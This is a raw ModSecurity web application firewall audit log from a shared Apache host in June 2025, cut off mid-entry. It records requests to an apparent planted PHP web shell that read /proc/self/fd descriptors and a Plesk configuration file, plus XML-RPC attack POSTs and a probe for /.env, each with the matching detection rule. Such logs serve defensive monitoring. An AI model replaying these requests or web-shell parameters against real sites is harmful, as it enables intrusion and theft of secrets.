--2144a111-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/120 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.221.180.179 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2144a111-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --2144a111-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/120"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/120"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFChNHTSPZEgHS3rvxJjXwAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750114612559688 4564 (- - -) Stopwatch2: 1750114612559688 4564; combined=2228, p1=352, p2=1752, p3=38, p4=27, p5=58, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2144a111-Z-- --ce6cc444-A-- [17/Jun/2025:04:27:40.576081 +0530] aFChZFJfblPUQiSn5r2KVgAAAAA 52.45.77.169 55284 127.0.0.1 7081 --ce6cc444-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/136 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.45.77.169 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --ce6cc444-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --ce6cc444-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/136"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/136"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFChZFJfblPUQiSn5r2KVgAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750114660571743 4390 (- - -) Stopwatch2: 1750114660571743 4390; combined=2318, p1=361, p2=1836, p3=39, p4=28, p5=54, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ce6cc444-Z-- --5bf1671e-A-- [17/Jun/2025:04:27:57.218569 +0530] aFChdUcTB7P_sALtclASNAAAAAI 3.214.176.44 39418 127.0.0.1 7081 --5bf1671e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/155 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.214.176.44 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --5bf1671e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --5bf1671e-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/155"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/155"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFChdUcTB7P_sALtclASNAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750114677214428 4191 (- - -) Stopwatch2: 1750114677214428 4191; combined=2161, p1=353, p2=1692, p3=35, p4=27, p5=54, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5bf1671e-Z-- --c7b8d126-A-- [17/Jun/2025:04:28:28.686340 +0530] aFChlIoVQnPDyHnl9oPMQwAAAAY 100.27.153.9 50374 127.0.0.1 7081 --c7b8d126-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/27 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 100.27.153.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c7b8d126-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --c7b8d126-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/27"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/27"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFChlIoVQnPDyHnl9oPMQwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750114708682313 4079 (- - -) Stopwatch2: 1750114708682313 4079; combined=2115, p1=357, p2=1643, p3=36, p4=27, p5=51, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c7b8d126-Z-- --6387df05-A-- [17/Jun/2025:04:33:03.706576 +0530] aFCip5WbMc1Q3J_M-mhB5gAAAAo 216.73.216.240 43770 127.0.0.1 7081 --6387df05-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2Fbackup%2FExtension&viewfile=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2Fbackup%2FExtension%2FConfiguration.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6387df05-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4011 Connection: close Content-Type: text/html; charset=UTF-8 --6387df05-H-- Message: Warning. Matched phrase "/configuration.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /configuration.php found within ARGS:viewfile: /opt/psa/admin/plib/backup/extension/configuration.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/configuration.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /configuration.php found within ARGS:viewfile: /opt/psa/admin/plib/backup/extension/configuration.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCip5WbMc1Q3J_M-mhB5gAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750114983700800 5884 (- - -) Stopwatch2: 1750114983700800 5884; combined=2895, p1=464, p2=2167, p3=50, p4=114, p5=100, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6387df05-Z-- --9066d948-A-- [17/Jun/2025:04:33:46.590161 +0530] aFCi0ZVkCcfT-Z8NQYy-VgAAAAc 213.204.244.147 49346 127.0.0.1 7081 --9066d948-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9066d948-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9066d948-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCi0ZVkCcfT-Z8NQYy-VgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115025854788 735439 (- - -) Stopwatch2: 1750115025854788 735439; combined=2688, p1=374, p2=1857, p3=89, p4=57, p5=192, sr=101, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9066d948-Z-- --6a3ad66b-A-- [17/Jun/2025:04:35:33.999573 +0530] aFCjPaRT9PYLci8mxb0nwgAAAAM 213.204.244.147 40284 127.0.0.1 7081 --6a3ad66b-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 678 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --6a3ad66b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6a3ad66b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCjPaRT9PYLci8mxb0nwgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115133227325 772312 (- - -) Stopwatch2: 1750115133227325 772312; combined=2099, p1=338, p2=1392, p3=67, p4=48, p5=156, sr=91, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6a3ad66b-Z-- --0e8aee43-A-- [17/Jun/2025:04:37:33.446378 +0530] aFCjtJVkCcfT-Z8NQYy_BgAAAAc 213.204.244.147 47010 127.0.0.1 7081 --0e8aee43-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 680 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0e8aee43-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0e8aee43-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCjtJVkCcfT-Z8NQYy_BgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115252698686 747757 (- - -) Stopwatch2: 1750115252698686 747757; combined=1890, p1=283, p2=1213, p3=72, p4=56, p5=167, sr=82, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0e8aee43-Z-- --932a7d22-A-- [17/Jun/2025:04:37:36.540956 +0530] aFCjuKRT9PYLci8mxb0oEAAAAAM 23.21.148.226 47180 127.0.0.1 7081 --932a7d22-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/86 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.21.148.226 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --932a7d22-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --932a7d22-H-- Message: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/self/fd/86"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/self/fd/86"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCjuKRT9PYLci8mxb0oEAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750115256536894 4114 (- - -) Stopwatch2: 1750115256536894 4114; combined=2145, p1=305, p2=1721, p3=37, p4=28, p5=54, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --932a7d22-Z-- --d1375069-A-- [17/Jun/2025:04:37:44.478080 +0530] aFCjwKC450Yw050Ymr0gggAAAAk 52.3.102.51 40300 127.0.0.1 7081 --d1375069-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/104 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.3.102.51 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --d1375069-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --d1375069-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/104"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/104"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCjwKC450Yw050Ymr0gggAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750115264473984 4155 (- - -) Stopwatch2: 1750115264473984 4155; combined=2099, p1=362, p2=1620, p3=36, p4=28, p5=53, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d1375069-Z-- --3984b80a-A-- [17/Jun/2025:04:38:32.110161 +0530] aFCj76C450Yw050Ymr0glQAAAAk 52.169.149.214 46342 127.0.0.1 7081 --3984b80a-B-- GET /hitech-news.com HTTP/1.0 Host: www.rsda.in X-Real-IP: 52.169.149.214 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --3984b80a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --3984b80a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.rsda.in|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.rsda.in|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.rsda.in"] [uri "/hitech-news.com"] [unique_id "aFCj76C450Yw050Ymr0glQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115311699219 411004 (- - -) Stopwatch2: 1750115311699219 411004; combined=1826, p1=303, p2=1399, p3=0, p4=0, p5=124, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3984b80a-Z-- --c41bac34-A-- [17/Jun/2025:04:39:32.334496 +0530] aFCkK5VkCcfT-Z8NQYy_OAAAAAc 143.198.155.199 34082 127.0.0.1 7081 --c41bac34-B-- GET /.env HTTP/1.0 Host: edatashop.cstechns.com X-Real-IP: 143.198.155.199 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept-Charset: utf-8 Accept-Encoding: gzip --c41bac34-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://edatashop.cstechns.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Connection: close Content-Type: text/html; charset=UTF-8 --c41bac34-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "edatashop.cstechns.com"] [uri "/.env"] [unique_id "aFCkK5VkCcfT-Z8NQYy_OAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/edatashop.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115371128004 1206561 (- - -) Stopwatch2: 1750115371128004 1206561; combined=1872, p1=456, p2=1318, p3=0, p4=0, p5=98, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c41bac34-Z-- --15eb7872-A-- [17/Jun/2025:04:39:33.255112 +0530] aFCkLFJfblPUQiSn5r2MBAAAAAA 213.204.244.147 34152 127.0.0.1 7081 --15eb7872-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --15eb7872-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --15eb7872-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCkLFJfblPUQiSn5r2MBAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115372529222 725985 (- - -) Stopwatch2: 1750115372529222 725985; combined=20831, p1=357, p2=1547, p3=70, p4=52, p5=9439, sr=106, sw=9366, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --15eb7872-Z-- --fc11434e-A-- [17/Jun/2025:04:40:34.704370 +0530] aFCkaVJfblPUQiSn5r2MHgAAAAA 213.204.244.147 42342 127.0.0.1 7081 --fc11434e-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fc11434e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fc11434e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (0+1 hits since last 